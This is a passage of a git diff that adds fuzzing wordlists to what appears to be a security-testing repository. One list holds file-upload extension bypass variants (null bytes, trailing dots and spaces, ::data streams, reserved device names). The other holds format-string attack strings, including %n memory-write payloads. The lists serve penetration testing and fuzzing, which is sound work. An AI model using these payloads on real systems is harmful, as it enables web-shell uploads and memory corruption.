+{PHPSCRIPT}.php.php.rar +{PHPSCRIPT}.php.rar +cfm +cfml +cfc +dbm +cFm +cFml +cFc +dBm +cfm%20%20%20 +cfml%20%20%20 +cfc%20%20%20 +dbm%20%20%20 +cFm%20%20%20 +cFml%20%20%20 +cFc%20%20%20 +dBm%20%20%20 +cfm...... +cfml...... +cfc....... +dbm...... +cFm...... +cFml...... +cFc...... +dBm...... +cfm%20%20%20...%20.%20.. +cfml%20%20%20...%20.%20.. +cfc%20%20%20...%20.%20.. +dbm%20%20%20...%20.%20.. +cFm%20%20%20...%20.%20.. +cFml%20%20%20...%20.%20.. +cFc%20%20%20...%20.%20.. +dBm%20%20%20...%20.%20.. +cfm%00 +cfml%00 +cfc%00 +dbm%00 +cFm%00 +cFml%00 +cFc%00 +dBm%00 +: +%00index.html +;index.html +%00 +{ASPSCRIPT} +{ASPSCRIPT}.{EXT} +{ASPSCRIPT}; +{ASPSCRIPT};.{EXT} +{ASPSCRIPT}%00 +{ASPSCRIPT}%00.{EXT} +{ASPSCRIPT}::data%00. +{ASPSCRIPT}::data%00.{EXT} +* +. +" +/ +\ +[ +] +: +; +| += +, +jsp +jspx +jsw +jsv +jspf +jSp +jSpx +jSw +jSv +jSpf +jSp%00 +jSp%20%20%20 +jSp%20%20%20...%20.%20..a +jSp...... +jSpf%00 +jSpf%20%20%20 +jSpf%20%20%20...%20.%20..a +jSpf...... +jSpx%00 +jSpx%20%20%20 +jSpx%20%20%20...%20.%20..a +jSpx...... +jSv%00 +jSv%20%20%20 +jSv%20%20%20...%20.%20..a +jSv...... +jSw%00 +jSw%20%20%20 +jSw%20%20%20...%20.%20..a +jSw...... +jsp%00 +jsp%20%20%20 +jsp%20%20%20...%20.%20..a +jsp...... +jspf%00 +jspf%20%20%20 +jspf%20%20%20...%20.%20..a +jspf...... +jspx%00 +jspx%20%20%20 +jspx%20%20%20...%20.%20..a +jspx...... +jsv%00 +jsv%20%20%20 +jsv%20%20%20...%20.%20..a +jsv...... +jsw%00 +jsw%20%20%20 +jsw%20%20%20...%20.%20..a +jsw...... +pl +pm +cgi +pL +pM +cGi +lib +lIb +cGi%00 +cGi%20%20%20 +cGi...... +cgi%00 +cgi%20%20%20 +cgi...... +lIb%00 +lIb%20%20%20 +lIb...... +lib%00 +lib%20%20%20 +lib...... +pL%00 +pL%20%20%20 +pL...... +pM%00 +pM%20%20%20 +pM...... +pl%00 +pl%20%20%20 +pl...... +pm%00 +pm%20%20%20 +pm...... +{ASPSCRIPT} +{ASPSCRIPT}; +{ASPSCRIPT};.jpg +{ASPSCRIPT};.pdf +{ASPSCRIPT};.html +{ASPSCRIPT};.htm +{ASPSCRIPT};.txt +{ASPSCRIPT};.xyz +{ASPSCRIPT};.zip +{ASPSCRIPT};.tgz +{ASPSCRIPT};.doc +{ASPSCRIPT};.docx +{ASPSCRIPT};.xls +{ASPSCRIPT};.xlsx +{ASPSCRIPT}%00.jpg +{ASPSCRIPT}%00.pdf +{ASPSCRIPT}%00.html +{ASPSCRIPT}%00.txt +{ASPSCRIPT}%00.xyz +{ASPSCRIPT}%00.tgz +{ASPSCRIPT}%00.zip +{ASPSCRIPT}%00.doc +{ASPSCRIPT}%00.docx +{ASPSCRIPT}%00 +{ASPSCRIPT}::data%00.jpg +{ASPSCRIPT}::data%00.pdf +{ASPSCRIPT}::data%00.html +{ASPSCRIPT}::data%00.txt +{ASPSCRIPT}::data%00.zip +{ASPSCRIPT}::data%00.doc +{ASPSCRIPT}::data%00.xls +{ASPSCRIPT}%00%20%20%20 +{ASPSCRIPT}%00%20%20%20...%20.%20.. +{ASPSCRIPT}%00...... +{ASPSCRIPT}%20%20%20 +{ASPSCRIPT}%20%20%20...%20.%20.. +{ASPSCRIPT}...... +{ASPSCRIPT}::data%00%%20%20%20 +{ASPSCRIPT}::data%00%%20%20%20...%20.%20.. +{ASPSCRIPT}::data%00%...... +{ASPSCRIPT}%00%20%20%20;.jpg +{ASPSCRIPT}%00%20%20%20;.doc +{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg +{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc +{ASPSCRIPT}%00......;.jpg +{ASPSCRIPT}%00......;.doc +{ASPSCRIPT}%20%20%20;.jpg +{ASPSCRIPT}%20%20%20;.doc +{ASPSCRIPT}%20%20%20...%20.%20..;.jpg +{ASPSCRIPT}%20%20%20...%20.%20..;.doc +{ASPSCRIPT}......;.jpg +{ASPSCRIPT}......;.doc +{ASPSCRIPT}::data%00%%20%20%20;.jpg +{ASPSCRIPT}::data%00%%20%20%20;.doc +{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg +{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc +{ASPSCRIPT}::data%00%......;.jpg +{ASPSCRIPT}::data%00%......;.doc +phtml +php +php3 +php4 +php5 +inc +pHtml +pHp +pHp3 +pHp4 +pHp5 +iNc +iNc%00 +iNc%20%20%20 +iNc%20%20%20...%20.%20.. +iNc...... +inc%00 +inc%20%20%20 +inc%20%20%20...%20.%20.. +inc...... +pHp%00 +pHp%20%20%20 +pHp%20%20%20...%20.%20.. +pHp...... +pHp3%00 +pHp3%20%20%20 +pHp3%20%20%20...%20.%20.. +pHp3...... +pHp4%00 +pHp4%20%20%20 +pHp4%20%20%20...%20.%20.. +pHp4...... +pHp5%00 +pHp5%20%20%20 +pHp5%20%20%20...%20.%20.. +pHp5...... +pHtml%00 +pHtml%20%20%20 +pHtml%20%20%20...%20.%20.. +pHtml...... +php%00 +php%20%20%20 +php%20%20%20...%20.%20.. +php...... +php3%00 +php3%20%20%20 +php3%20%20%20...%20.%20.. +php3...... +php4%00 +php4%20%20%20 +php4%20%20%20...%20.%20.. +php4...... +php5%00 +php5%20%20%20 +php5%20%20%20...%20.%20.. +php5...... +phtml%00 +phtml%20%20%20 +phtml%20%20%20...%20.%20.. +phtml...... +asp +aspx +asa +aSP +aSpx +aSa +asp%20%20%20 +aspx%20%20%20 +asa%20%20%20 +aSP%20%20%20 +aSpx%20%20%20 +aSa%20%20%20 +asp...... +aspx...... +asa...... +aSP...... +aSpx...... +aSa...... +asp%20%20%20...%20.%20.. +aspx%20%20%20...%20.%20.. +asa%20%20%20...%20.%20.. +aSP%20%20%20...%20.%20.. +aSpx%20%20%20...%20.%20.. +aSa%20%20%20...%20.%20.. +asp%00 +aspx%00 +asa%00 +aSp%00 +aSpx%00 +aSa%00 +templates_compiled +templates_c +templates +temporary +images +cache +temp +files +tmp +CON.{EXT} +PRN.{EXT} +AUX.{EXT} +CLOCK$.{EXT} +NUL.{EXT} +COM1.{EXT} +COM2.{EXT} +COM3.{EXT} +COM4.{EXT} +COM5.{EXT} +COM6.{EXT} +COM7.{EXT} +COM8.{EXT} +COM9.{EXT} +LPT1.{EXT} +LPT2.{EXT} +LPT3.{EXT} +LPT4.{EXT} +LPT5.{EXT} +LPT6.{EXT} +LPT7.{EXT} +LPT8.{EXT} +LPT9.{EXT} +*.{EXT} +".{EXT} +[.{EXT} +].{EXT} +:.{EXT} +|.{EXT} +=.{EXT} +,.{EXT} diff --git a/data/format-strings.txt b/data/format-strings.txt new file mode 100644 index 00000000..40df67cc --- /dev/null +++ b/data/format-strings.txt @@ -0,0 +1,57 @@ +%s%p%x%d +%p%p%p%p +%x%x%x%x +%d%d%d%d +%s%s%s%s +%99999999999s +%08x +%20d +%20n +%20x +%20s +%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d +%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i +%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o +%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u +%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x +%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X +%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a +%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A +%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e +%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E +%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f +%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F +%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g +%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G +%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s +%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p +%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% +XXXXX.%p +XXXXX`perl -e 'print ".%p" x 80'` +`perl -e 'print ".%p" x 80'`%n +%08x.%08x.%08x.%08x.%08x\n +XXX0_%08x.%08x.%08x.%08x.%08x\n +%.16705u%2\$hn +\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| +AAAAA%c +AAAAA%d +AAAAA%e +AAAAA%f +AAAAA%I +AAAAA%o +AAAAA%p +AAAAA%s +AAAAA%x +AAAAA%n +ppppp%c +ppppp%d +ppppp%e +ppppp%f +ppppp%I +ppppp%o +ppppp%p +ppppp%s +ppppp%x +ppppp%n +%@ +%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ diff --git a/data/html_fuzz.txt b/data/html_fuzz.txt new file mode 100644 index 00000000..b20b167d --- /dev/null +++ b/data/html_fuzz.txt @@ -0,0 +1,189 @@ + + + + + +

+ + +
+